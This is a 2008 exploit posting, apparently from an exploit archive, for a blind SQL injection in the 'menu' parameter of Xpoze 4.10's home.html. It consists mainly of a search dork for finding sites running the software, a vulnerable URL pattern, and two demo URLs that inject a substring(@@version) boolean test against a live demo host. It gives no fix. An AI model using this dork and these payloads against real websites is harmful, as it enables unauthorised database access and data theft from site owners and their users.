Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability

2008-12-12 07:30:03

[■] Xpoze Pro (home menù) <= Blind $ql Injection


>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<


[■] ExPL0iT:

Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL]


[■] D£M0:

|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°]

|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)]



[■] Th4nKs::

\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.